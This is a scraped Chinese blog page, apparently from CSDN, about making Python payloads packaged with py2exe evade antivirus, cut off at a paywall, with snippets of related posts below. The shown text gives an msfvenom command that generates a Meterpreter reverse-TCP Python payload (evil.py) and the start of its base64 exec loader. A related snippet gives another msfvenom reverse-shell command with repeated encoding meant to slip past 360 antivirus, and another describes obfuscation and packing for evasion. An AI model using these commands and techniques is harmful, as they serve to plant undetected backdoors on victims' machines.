python打包的exe如何免杀_使用Python进行防病毒免杀

最新推荐文章于 2024-05-24 13:46:18 发布
最新推荐文章于 2024-05-24 13:46:18 发布
阅读量753 收藏 2
点赞数
文章标签: python打包的exe如何免杀
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。0x01 环境准备1、软件安装Python 2.7.16 x86:ht...
摘要由CSDN通过智能技术生成

很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?

打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi

Py2exe 32位:https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

evil-1.png

894761-20191212192507829-1465308333.png

evil.py 代码如下:

import base64,sys;exec(base64.b64decode({2:str,3:lambd

最低0.47元/天 解锁文章
weixin_39979167
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python打包exe文件踩平坑
老孙头
11-15 464
1. 保存好需要打包的py文件; 2. win+r,打开“运行”窗口,在输入框中输入cmd,打开命令行窗口; 3. 用cd等命令进入到要打包的py文件目录,用下列命令进行打包: pyinstaller-Fxxx.py--noconsole 注意:F是大写 4. 如果pyinstaller不可用,需要安装pyinstaller: pip installpyinstaller 5...
pythonexe怎么不会被杀毒软件_使用Python Shells绕过杀毒软件
weixin_33045057的博客
02-04 2255
一、绕过杀毒软件Why?1、使用绕过反病毒软件的方式要比禁用杀毒软件更加安全;2、展示客户端的反病毒软件是多么脆弱的非常有趣。How?如果你使用二进制,而这个二进制文件被You can bypass AV修改导致它的签名被移除了,然后加密、打包,修改源代码或者重新编辑源代码并使用我个人最喜欢的自定义程序。When?只要shell写入磁盘,你就可以开始进行啦!二、为什么选择Python?Python...
360卫士、杀毒python打包文件报毒解决(使用pyinstaller打包
最新发布
weixin_54857594的博客
05-24 656
更换旧版本python(实测3.6.8可用)
pyinstaller打包exe免杀和逆向浅析
crowsec
01-27 6779
本文主要对pyinstaller打包的文件进行了超简单逆向分析,在这里也有一些免杀的小小的tips,其中也参考了诸多的资料,不乏有诸多错误,希望各位师傅能够批评指正。
python pyinstaller 打包报病毒、黑框一闪而过
csd_ct的专栏
02-28 7297
基本的参数,如: # -F 打包为一个文件 # -w 除去dos黑框 # -i 指定icon文件 pyinstaller.exe -F -w -i u.ico pscan.py 最近用pyinstaller 打包py程序时,在运行打包成功后的exe时,系统立马弹出警告框说是有病毒,我开始以为是,杀毒软件太敏感,就先手动关闭警告。后来在运行的过程中,有个黑框一闪而过,这太影响体验了,本来不是病毒,人家运行只是,肯定以为含有病毒或者后门之类的.........., 后来,经过查找和分析,发现,在py
python将文件打包exe经常性的被360软件杀掉问题
小猪观察员的博客
01-09 1475
应该pathlib是python有自带的库,在虚拟环境下也进行了安装,此时打包的时候发生了冲突。所以根据提示,将虚拟环境下的pathlib包进行pip uninstall 操作后。运行程序,程序可以正常运行,同时进行打包后,打包ok。在python将程序打包后,发生360会一直将自己打包出来的文件进行清楚,查询资料发生可能是因为调用了os库。使用pyinstaller打包遇到的问题,程序还是会被360进行查杀,沙币360。进行检查,360是否还会将程序杀掉。
python打包exe如何免杀_Metasploit+python生成免杀exe过360杀毒
weixin_39771301的博客
11-26 672
Metasploit+python生成免杀exe过360杀毒1在kali下生成一个反弹的msf的python脚本,命令如下:msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /opt/bk.py2.拷贝出bk.py到windo...
使用Python进行防病毒免杀解析
09-18
主要介绍了使用Python进行防病毒免杀,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
python_programs.tar.gz_python website
09-23
标题 "python_programs.tar.gz" 暗示这是一个使用Python编程语言编写的程序集合,它们被压缩成一个tar.gz文件以便于存储和传输。这种格式是Linux和Unix系统中常见的,它结合了tar(用于打包多个文件)和gzip(用于...
Python程序打包成 .exe文件
12-21
假设你的Python脚本名为`test.py`,你可以使用以下命令进行打包: ```bash pyinstaller -F test.py ``` 这里,`-F`参数表示创建一个单个的可执行文件,而不是一个包含多个文件的目录。执行这个命令后,PyInstaller...
pyinstaller 打包exepython在程序运行没问题,在打包后的exe报导入的包错误情况下,打包生成exe方式
06-19
4.pyinstaller 打包exepython在程序运行没问题,在打包后的exe报导入的包错误情况下例如:No module named cx_Oracle,打包生成exe方式
exe免杀宝典 #exe免杀 #Python打包exe
xiaozhao_666的博客
05-19 1434
exe免杀毒教程 目录 exe免杀毒教程 引子 准备和配置 方法 引子 上次我不是做了个打包exe文件的教程吗(没看点这里),结果装360的时候出了点状况,文件GG了 我太难了 于是我突发奇想,绞尽脑汁的去想如何做到Pythonexe免杀毒 准备和配置 这个方法测试时情况如下 时间:2022.5.19 使用包:pyinstaller 测试软件:360杀毒,360安全卫士,火绒(没全装好) 程序编译软件:PyCharm Community Edition 2022.1.
Metasploit+python生成免杀exe过360杀毒
weixin_30900589的博客
04-29 880
Metasploit+python生成免杀exe过360杀毒 1在kali下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /opt/bk.py 2...
当PyInstaller打包的文件被判定为病毒
jupiter221的博客
09-27 9859
是不是很多小伙伴都遇到过这样的问题: 通过pyinstaller给*.py文件打包之后,莫名其妙地360或者其他的杀毒软件认定为病毒文件,然后被隔离。 或者把自己打包好的文件当做附件用gmail发送的时候,会被认定为病毒文件。 不要怕,我们这时候要检查一下我们代码: 看看我们是否有os库 os库虽然很方便,也是python的内置库,但是,据说某些不怀好意的人,写病毒的时候经常用到os库,于是可怜的os库就被各大杀毒软件跟谷歌拉黑了。 于是,你要放弃掉这个小可怜。 解决方案: pathlib欢
python打包exe如何免杀_使用Python进行防病毒免杀解析
weixin_39984952的博客
11-21 1250
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。0x01 环境准备1、软件安装2、msfvenom生成Python P...
python打包exe如何免杀_Python 制作免杀后门(原创)
weixin_39830175的博客
11-21 617
CentOS6.5下netcat工具安装教程1.下载下载的是netcat-0.7.1.tar.gz版本2.拷贝用U盘拷贝到/home/Hadoop目录下进行解压:cd /home/hadooptar -zxvf netcat-0.7.1.tar.gz -C /usr/local改名:cd /usr/localmv netcat-0.7.1 netcat3.安装切换目录:cd /usr/local/...
360查出 HEUR/Malware.QVMxx.Gen 病毒含义
热门推荐
夜色
06-17 4万+
QVM全称是Qihoo Virtual Machine(即奇虎虚拟机),类似金山的蓝芯II,是360在云端的鉴定器。当查杀病毒时,如果文件不在白名单之列,同时其他鉴定器也不能完全判断安全时,就是QVM发威的时候。所以,当查到病毒名为Malware.QVMXX.GEN时(XX为00到40任一数字,代表不同型号的QVM鉴定器,其中编号20出现频率最大),就是QVM鉴定出来的结果。当然,不可避免QVM是有
python 免杀远控
05-10
Python 免杀远控是一种利用 Python 编写的远程控制软件,它可以在绝大部分主流操作系统上运行,并且在被安装之后可以远程控制对方计算机。 由于 Python 是一种流行的编程语言,因此很多黑客和攻击者都利用 Python 编写远程控制软件。然而,许多防病毒软件和安全性软件都会在扫描文件时检测到并阻止这些攻击软件的运行。 为了免遭检测,攻击者会采用各种方法来隐藏远控软件,从而实现免杀。其中常见的方法包括: 1. 僵尸进程:攻击者会将远控软件做成一个僵尸进程,使其看起来像一个正常的系统进程。这样做可以让防病毒软件误认为这是一个合法的系统进程,从而放过该进程。 2. 免杀加壳:攻击者会将 Python 的源代码打包加密成特定格式的二进制文件,并加上壳。这样可以隐藏代码,并且使病毒扫描器无法解析其中的文件内容。 3. 代码混淆:攻击者会利用 Python 本身的特性,混淆代码使其变得难以理解和检测。例如,他们可以使用函数名、变量名等随机的字符串来替换原有的代码名称,或者将代码分成多个模块并交叉引用。 总之,为了免杀,攻击者会采用各种方法来隐藏远控软件,使其看起来像一个正常的系统进程。因此,用户和安全人员需要持续关注安全漏洞,并采取适当的安全措施来保护自己的计算机和数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值